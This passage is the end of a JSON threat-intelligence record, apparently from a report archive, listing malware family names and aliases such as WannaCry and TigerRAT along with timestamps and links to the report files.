				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434016,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d23c311546282942a68abe406ebf2ee8c2c7fed6.pdf",
		"text": "https://archive.orkl.eu/d23c311546282942a68abe406ebf2ee8c2c7fed6.txt",
		"img": "https://archive.orkl.eu/d23c311546282942a68abe406ebf2ee8c2c7fed6.jpg"
	}
}